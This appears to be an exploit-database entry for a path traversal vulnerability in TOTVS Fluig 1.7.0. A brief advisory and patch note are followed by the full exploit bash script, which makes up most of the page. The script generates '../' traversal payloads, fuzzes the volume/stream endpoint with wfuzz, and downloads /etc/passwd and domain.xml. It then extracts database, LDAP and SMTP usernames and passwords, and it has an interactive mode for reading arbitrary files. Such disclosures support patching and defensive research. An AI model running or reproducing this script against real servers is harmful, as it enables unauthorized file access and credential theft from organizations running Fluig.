Fluig 1.7.0 - Path Traversal

vendor:

Fluig

by:

Lucas Souza

8.8

CVSS

HIGH

Path Traversal

CWE

Product Name: Fluig

Affected Version From: 1.7.0-210217

Affected Version To: 1.7.0-201124

Patch Exists: YES

Related CWE: N/A

CPE: a:totvs:fluig:1.7.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows, Linux, Mac

2020

Fluig 1.7.0 – Path Traversal

Fluig 1.7.0 is vulnerable to Path Traversal. An attacker can use this vulnerability to access sensitive files and directories that are stored outside the web root folder. This can include application files, configuration files, and other files stored on the server. The vulnerability exists due to insufficient validation of user-supplied input in the 'file' parameter of the 'vol' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g., '../') in the 'file' parameter of the 'vol' parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of Fluig 1.7.0.

Source

Exploit-DB raw data:

# Exploit Title: Fluig 1.7.0 - Path Traversal
# Date: 26/11/2020
# Exploit Author: Lucas Souza
# Vendor Homepage: https://www.totvs.com/fluig/
# Version: <== 1.7.0-210217
# Tested on: 1.7.0-201124

#!/bin/bash
url="$1"
npayload=$2
> payload.txt
curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner
# -- FUNCTIONS --

function create-payload {
    > wordlist.txt
    count=1
    while [[ $count -le $npayload ]]; do
                                                                        # WINDOWS PAYLOAD
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt
                                                                        # LINUX PAYLOAD
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
        count=$[$count + 1]
    done
}

function manual-mode {
    while :; do
        echo
        echo -e "\033[0;31m[!] VALID MANUAL MODE COMMANDS\033[0m"
        echo
        echo -e "\033[0;32m   -[ clear          -     Clear Screen\033[0m"
        echo -e "\033[0;32m   -[ target         -     Set a target\033[0m"
        echo -e "\033[0;32m   -[ director/file  -     Ex: /etc/passwd\033[0m"
        echo -e "\033[0;32m   -[ info           -     Target info and parse 'domain.xml' file ( require target )\033[0m"
        echo
        echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2
        path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]')
        mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]')
        if [[ $path == 'info' ]]; then
            clear
            cat banner
            domain-xml
        elif [[ $path == 'clear' ]]; then
            clear
        elif [[ $path == 'target' ]]; then
            XmlPayload=''
            echo
            echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url
            echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload
            enum
       else
           echo
           echo "$param../../../../../../../../../../../../..$path" > wordlist.txt
           wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt
           DirPath=$(head -1 payload.txt)
       if [[ $DirPath  == '' ]]; then
           echo
           echo -e '            \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m'
       else
           curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile
           echo
           echo -e '\033[0;31m'$path'\033[0m'
           echo
           cat report/$mdr/$mkfile
           echo
           pwd=$(pwd)
           echo
           echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m'
      fi
      fi
    done
}

function domain-xml {
    domain=$(ls report/$mdr | grep domain.xml)
if [[ $domain == '' ]]; then
    echo
    echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
else
    echo
    echo -e '     \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m'
    echo
    echo -e '            \033[0;33m[!] INFORMATION\033[0m'
    echo
    curl -s -I $url | grep Server
    echo
    echo -e '\033[0;31mTarget\033[0m'
    echo $url
    echo
    echo -e '\033[0;31mPayload plaintext\033[0m'
    echo $XmlPayload | base64 -d
    echo
    echo
    echo -e '\033[0;31mPayload base64 encoded\033[0m'
    echo $XmlPayload
    echo
    echo -e '            \033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m'
    echo
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's/<connection-url>/\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g'
    echo
    echo -e '            \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m'
    echo
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's/<user-name>/ \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g' 
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's/<password>/\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g'
    echo
    echo -e '            \033[0;31m[!] LDAP INTEGRATIONS\033[0m'
    echo 
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/<module-optionname="java.naming.provider.url"value="/\o033[0;31mDOMAIN SERVER >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/<module-optionname="baseCtxDN"value="/\o033[0;31mDISTINGUISHED NAME >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/<module-optionname="java.naming.security.principal"value="/\o033[0;31mUSER ADMIN >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/<module-optionname="java.naming.security.credentials"value="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
    echo
    echo -e '            \033[0;31m[!] SMTP SETTINGS\033[0m'
    echo
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/<remote-destinationhost="/\o033[0;31mSMTP ADDRESS >> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's/<smtp-serveroutbound-socket-binding-ref="mail-smtp"//g' | sed 's/\/>//g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g'
    echo
    manual-mode
fi
}

function enum {
mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///')
mkdir -p report/$mdr
    if [[ $url == '' ]]; then
        clear
        cat banner
        echo -e '   \033[0;31m-[  Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m'
        echo -e '   \033[0;31m-[        Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m'
        echo -e '   \033[0;31m-[           ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m'
        manual-mode
    elif [[ $npayload == '' ]]; then
        npayload=25
        clear
        cat banner
        echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
        echo
        echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
        echo
        create-payload
    else
        clear
        cat banner
        echo -e '     \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
        echo
        echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
        create-payload
    fi
echo
echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m'
echo
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
payload=$(head -1 payload.txt)
if [[ $payload == '' ]]; then
    clear
    cat banner
    echo -e '  \033[0;32m | TOTVS FLUIG -  PATH ENUMERATION AND XML ANALISYS \033[0m'
    echo
    echo -e '\033[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m'
    echo
    manual-mode
else
    param=$(echo $payload | base64 -d |  cut -d '.' -f1)
    clear
    cat banner
    echo -e '     \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
    echo
    echo -e '            \033[0;33m[!] VULNERABLE\033[0m'
    echo
    echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m'
    echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt
    echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
    wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
    clear
    cat banner
    echo -e '     \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
    echo
    echo -e '            \033[0;33m[!] VULNERABLE\033[0m'
    echo
    curl -s -I $url | grep Server
    echo
    echo -e '\033[0;31mTarget\033[0m'
    echo $url
    echo
    echo -e '\033[0;31mPayload plaintext\033[0m'
    echo $payload | base64 -d
    echo
    echo
    echo -e '\033[0;31mPayload base64 encoded\033[0m'
    echo $payload
    echo
fi
XmlPayload=$(head -1 payload.txt)
if [[ $XmlPayload == '' ]]; then
    echo
    echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
    manual-mode
else
    curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml
    echo
    echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m'
    manual-mode
fi
}
enum